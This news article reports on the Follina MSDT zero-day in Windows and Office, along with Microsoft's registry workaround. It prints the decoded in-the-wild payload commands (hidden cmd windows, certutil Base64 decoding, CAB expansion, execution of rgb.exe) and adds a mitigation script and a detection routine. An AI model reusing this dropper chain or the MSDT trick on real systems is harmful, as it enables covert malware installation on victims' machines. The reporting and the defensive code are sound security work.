Code execution 0-day in Windows has been under active exploit for 7 weeks

A critical code execution zero-day in all supported versions of Windows has been under active exploit for seven weeks, giving attackers a reliable means for installing malware without triggering Windows Defender and a roster of other endpoint protection products.

The Microsoft Support Diagnostic Tool vulnerability was reported to Microsoft on April 12 as a zero-day that was already being exploited in the wild, researchers from Shadow Chaser Group said on Twitter. A response dated April 21, however, informed the researchers that the Microsoft Security Response Center team didn’t consider the reported behavior a security vulnerability because, supposedly, the MSDT diagnostic tool required a password before it would execute payloads.

Uh, nevermind

On Monday, Microsoft reversed course, identifying the behavior with the vulnerability tracker CVE-2022-30190 and warning for the first time that the reported behavior constituted a critical vulnerability after all.

“A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,” the advisory stated. “An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”

At the time of this story’s publication, Microsoft had yet to issue a patch. Instead, it was advising customers to disable the MSDT URL Protocol by:

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename”.
  3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.
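The same three-step workaround as a script, added here as an illustration and not Microsoft's own tooling: it checks for elevation, backs the key up before deleting it, and refuses to proceed if the backup fails. The backup location under ProgramData and its timestamped file name are assumptions.

```powershell
# Added example: scripted version of the three-step Microsoft workaround above.
# Not Microsoft's tooling. Run from an elevated PowerShell session.
# Assumption: the backup is written under $env:ProgramData with a timestamped name.
$KeyPath    = 'Registry::HKEY_CLASSES_ROOT\ms-msdt'
$BackupFile = Join-Path $env:ProgramData ('ms-msdt-backup-{0:yyyyMMdd-HHmmss}.reg' -f (Get-Date))

function Test-IsAdministrator {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

# Step 1: the advisory says "Run Command Prompt as Administrator"; enforce that here.
if (-not (Test-IsAdministrator)) {
    throw 'Run this script from an elevated (Administrator) session.'
}

if (-not (Test-Path -Path $KeyPath)) {
    Write-Host 'HKEY_CLASSES_ROOT\ms-msdt is not present; nothing to do.'
    return
}

# Step 2: back up the key before touching it (reg export HKEY_CLASSES_ROOT\ms-msdt filename).
& reg.exe export 'HKEY_CLASSES_ROOT\ms-msdt' $BackupFile /y | Out-Null
if ($LASTEXITCODE -ne 0 -or -not (Test-Path -Path $BackupFile)) {
    throw 'Backup failed; refusing to delete the key.'
}
Write-Host "Backup written to $BackupFile"

# Step 3: remove the handler (reg delete HKEY_CLASSES_ROOT\ms-msdt /f).
Remove-Item -Path $KeyPath -Recurse -Force

# Verify the handler is gone; to restore later, run: reg import <backup file>
if (Test-Path -Path $KeyPath) {
    throw 'HKEY_CLASSES_ROOT\ms-msdt still exists after deletion.'
}
Write-Host 'ms-msdt URL protocol handler removed.'
```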

Although initially missed by Microsoft, the vulnerability was again spotted when a researcher identified a Word document uploaded to VirusTotal on Friday that exploited the previously unknown attack vector.

According to analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands.

“That should not be possible,” Beaumont wrote.

Unfortunately, it is possible.

When the commands in the document are decoded, they translate to:

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

According to researcher John Hammond of security firm Huntress, the script:

  • Starts hidden windows to:
    • Kill msdt.exe if it is running
    • Loop through files inside a RAR file, looking for a Base64 string for an encoded CAB file
      • Store this Base64 encoded CAB file as 1.t
      • Decode the Base64 encoded CAB file to be saved as 1.c
      • Expand the 1.c CAB file into the current directory, and finally:
      • Execute rgb.exe (presumably compressed inside the 1.c CAB file)
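Detection logic for the chain Hammond describes, added here as an example rather than anything from the article or Huntress: it flags msdt.exe spawned by an Office application, a script that kills msdt.exe, and certutil -decode writing a decoded blob to disk. The records are constructed sample data; the field names (Parent, Image, CommandLine) and the Office process names beyond Word are assumptions.

```powershell
# Added example, not from the article or Huntress: detection logic for the
# process chain the decoded payload above produces, run over constructed records.
# Assumptions: the record fields mirror a process-creation log; Office names
# other than WINWORD.EXE are assumed siblings of the Word case in the article.
$ProcessEvents = @(
    [pscustomobject]@{ Parent = 'C:\Windows\explorer.exe'
                       Image = 'C:\Windows\System32\msdt.exe'
                       CommandLine = 'msdt.exe' }                               # user-launched troubleshooter
    [pscustomobject]@{ Parent = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
                       Image = 'C:\Windows\System32\msdt.exe'
                       CommandLine = 'msdt.exe "ms-msdt:<constructed placeholder>"' }
    [pscustomobject]@{ Parent = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       Image = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'cmd.exe /c taskkill /f /im msdt.exe' }
    [pscustomobject]@{ Parent = 'C:\Windows\System32\cmd.exe'
                       Image = 'C:\Windows\System32\certutil.exe'
                       CommandLine = 'certutil -decode 1.t 1.c' }
    [pscustomobject]@{ Parent = 'C:\Windows\System32\cmd.exe'
                       Image = 'C:\Windows\System32\certutil.exe'
                       CommandLine = 'certutil -hashfile setup.msi SHA256' }    # benign certutil use
)

function Find-MsdtAbuse {
    param([object[]]$Events)
    $officeApps = @('WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE')
    foreach ($e in $Events) {
        $parent = Split-Path -Path $e.Parent -Leaf
        $image  = Split-Path -Path $e.Image  -Leaf
        $reason = $null
        # -contains is case-insensitive, so WINWORD.EXE and winword.exe both match.
        if ($image -ieq 'msdt.exe' -and ($officeApps -contains $parent)) {
            $reason = 'msdt.exe spawned by an Office application (ms-msdt URL protocol from a document)'
        } elseif ($e.CommandLine -match '(?i)taskkill\s.*\bmsdt\.exe') {
            $reason = 'kills msdt.exe, as the in-the-wild payload does'
        } elseif ($e.CommandLine -match '(?i)certutil\b.*\s-decode\s') {
            $reason = 'certutil -decode turning a Base64 blob into a file (a CAB in the sample)'
        }
        if ($reason) {
            [pscustomobject]@{ Parent = $parent; Image = $image; CommandLine = $e.CommandLine; Reason = $reason }
        }
    }
}

Find-MsdtAbuse -Events $ProcessEvents | Format-Table -AutoSize
```

Against the sample records the explorer-launched msdt.exe and the certutil hash check pass silently; the other three are reported with their reason.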

Beaumont also called attention to this academic paper, which in August 2020 showed how to use MSDT to execute code. That suggests that there was at least one other time the company’s security team failed to grasp the potential for this behavior to be maliciously exploited.

No, Protected View won’t save you

Normally, Word is set up to load content downloaded from the Internet in what’s known as Protected View, a mode that disables macros and other potentially harmful functions. For reasons that aren’t clear, Beaumont said, if the document is loaded as a Rich Text Format file, it “runs without even opening the document (via the preview tab in Explorer) let alone Protected View.”

In other words, Huntress researchers wrote, the RTF file can “trigger the invocation of this exploit with just the Preview Pane within Windows Explorer.” In so doing, “this extends the severity of this threat by not just ‘single-click’ to exploit, but potentially with a ‘zero-click’ trigger.”

Besides the document uploaded to VirusTotal on Friday, researchers uncovered a separate Word file uploaded on April 12 that exploits the same zero-day.

Given the severity of this unpatched vulnerability, organizations that rely on Microsoft Office should thoroughly investigate how it affects their networks. Disabling the MSDT URL Protocol is unlikely to cause major disruption in the short run, and possibly not in the long run either. While investigating, and at least until Microsoft releases more details and guidance, Office users should turn the protocol off entirely and give any documents downloaded over the Internet additional scrutiny.
